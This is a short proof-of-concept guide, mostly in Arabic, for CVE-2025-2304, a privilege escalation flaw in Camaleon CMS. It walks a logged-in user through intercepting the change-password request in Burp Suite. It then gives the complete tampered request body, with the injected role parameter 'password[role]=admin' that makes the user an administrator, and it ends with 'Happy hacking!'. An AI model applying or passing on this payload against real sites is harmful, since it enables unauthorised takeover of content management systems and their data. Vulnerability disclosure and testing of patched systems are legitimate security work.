
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
CVE-2025-2304 POC - تصعيد الصلاحيات في Camaleon CMS
يُستخدم هذا الـ POC لاستغلال صلاحيات Camaleon CMS للوصول إلى المسؤول. يعمل الثغرة عن طريق حقن الدور في وظيفة إعادة تعيين كلمة المرور لمستخدم مصادق.
ابدأ بتسجيل الدخول إلى حساب المستخدم الخاص بك. بمجرد تسجيل الدخول، زر صفحة الملف الشخصي وانقر على تغيير كلمة المرور. قم باعتراض وظيفة تغيير كلمة المرور باستخدام Burp Suite.
باستخدام المثال أدناه، قم بتعديل حمولتك لإضافة الدور.
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin
بإضافة %5Brole%5D=admin إلى حمولتك، يجب أن تصبح الآن مسؤولاً.
قم بتحديث الصفحة وستصبح الآن مسؤولاً.
اختراق سعيد!